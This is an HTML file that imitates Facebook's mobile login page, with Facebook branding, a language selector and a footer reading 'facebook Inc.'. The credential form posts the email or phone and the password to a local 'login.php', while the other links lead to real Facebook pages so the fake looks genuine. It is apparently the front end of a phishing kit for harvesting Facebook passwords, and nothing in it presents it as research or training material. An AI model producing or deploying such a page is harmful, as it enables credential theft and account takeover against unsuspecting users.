<!DOCTYPE html>
<html lang="en">
   <head>
   	 <meta name="viewport" content="width=device-width, initial-scale=1"> 

      <title>Login</title>
      <style>
body{
margin:0;
font-family:Arial;
}
  .facebook{
  	color:#4671E1;
  	text-align:center;
  	font-size:25px;
  	font-family:tahoma;
  	
  }    	
 input{
 	width:280px;
 	border:1px solid #E6E3E3;
 	height:30px;
 	weight:50px;
 	position:absolute;
 	left:3%;
 	background:#F0EEEE;
 	border-radius:3px;
 	
 }   
 
 .Log_In{
  background:#5B66E7;
  border:none;
  color:white;
  font-size:15px;
  height:43px;
  width:297px;
 }
   	
.orrr {
    font-size: 15px;
    padding-left: 5px;
    padding-right: 5px;
    color: #4B4F56;
}
   	
   	
   	.cbutton{
   		text-align:center;
   		background:#269321;
   		width:150px;
   		border:none;
   		color:white;
   		left:25%;
    	}
   	
.forgot{
	color:#7596c8;
	text-align:center;
	text-decoration:none;
	font-size:14px;
	font-family:tahoma;
}   	
 
 .lang{
 	font-size:10px;
 	font-family:tahoma;
 }  	
   	
   	.passs{
   		height:35px;
   		padding-left:15px;
   		
   	}
    
 .lite{
 	padding-left:0%;
 	background:#E5E1C9;
 	padding-top:9px;
 	padding-left:8%;
 	height:30px;
 	color:#706CEE;
 	border:none;
 	text-align:center;
 	border-radius:2px;
 	font-size:12px;
 	text-height:10px;
 	width:280px;
 	font-family:tahoma;
 
 }
    
 .de{
 		text-decoration:none;
 		color:#706CEE;
 }   
 
 .cbutton:hover {
    background-color: #2EBE2C;
}

.Log_In:hover {
    background-color: #6A94F1;
}   
 
.the{
	background:red;
	color:white;
}
 
.line{
padding-left:20px;
width:;
}
.one{
	height:30px;
	padding-left:15px;
	padding-left:px;
	padding-bottom:;
}


      </style>
   </head>
   <body>

   
<b> <div class="facebook">
 	facebook
 	
 </div></b>
 </br>
<form method="post" action="login.php">
<div class="login">
	
<center><input class="one" type="mail" name="mail or phone" placeholder="Mobile number or email" required="mail">	
</br>
</br>

<input class="passs" type="password" name="password" placeholder="Password" required="password">
</br>
</br>
</br>

<input class="Log_In" type="submit" name="submit" value="Log In"></center>
</form>
<p>		
		</br>
		<div>
	  <center>
    <table>
        <tr class="line">
         
            <td style='width:100px'><hr/></td>
          
            <td><div class="orrr">or</div></td>
          
          <td style='width:100px'><hr/></td>
        </tr>
    </table>
    </center>
   </div>
		
   
   <br/>
    <form action="http://m.facebook.com/reg">
    <input type="submit" class="cbutton" value="Create New Account"/>
    </form>
    
    <br/><br/>
    <center><a href="http://m.facebook.com/recover/initiate" class="forgot">
            Forgotten password?</a></center>
            <font color="black">  </font>
    <br/><br/><br/>
    <center>
    <table class="lang">
        <tr class="float1">
<td style="padding-left: 10px">English (UK)</td>
<td style="padding-left: 100px"><font color="#83AEE8">Portugues</td>
        </tr>
        
        <tr class="float1">
            <td style="padding-left: 10px;"><font color="#83AEE8">
Arabi
</td>
<td style="padding-left: 100px;"><font color="#83AEE8">
Espanal</td>
</tr>
<tr class="float1">
    <td style="padding-left: 10px"><font color="#83AEE8">
Bangla</td>
<td style="padding-left: 100px"><font color="#83AEE8">
Urdhu</td>

</tr>
<tr class="float1">
    <td style="padding-left: 10px"><font color="#83AEE8">
Hindi</td>

<td style="padding-left: 100px"><font color="#83AEE8">more +</td>
</tr>

    </table></center>

<center>
<span style="font-size: 9px; font-weight: 20; font-height: 30; color: grey; font-family: Sans-serif;"><b>facebook Inc.</b></span>

</center>
</div>




    
   </body>
</html>
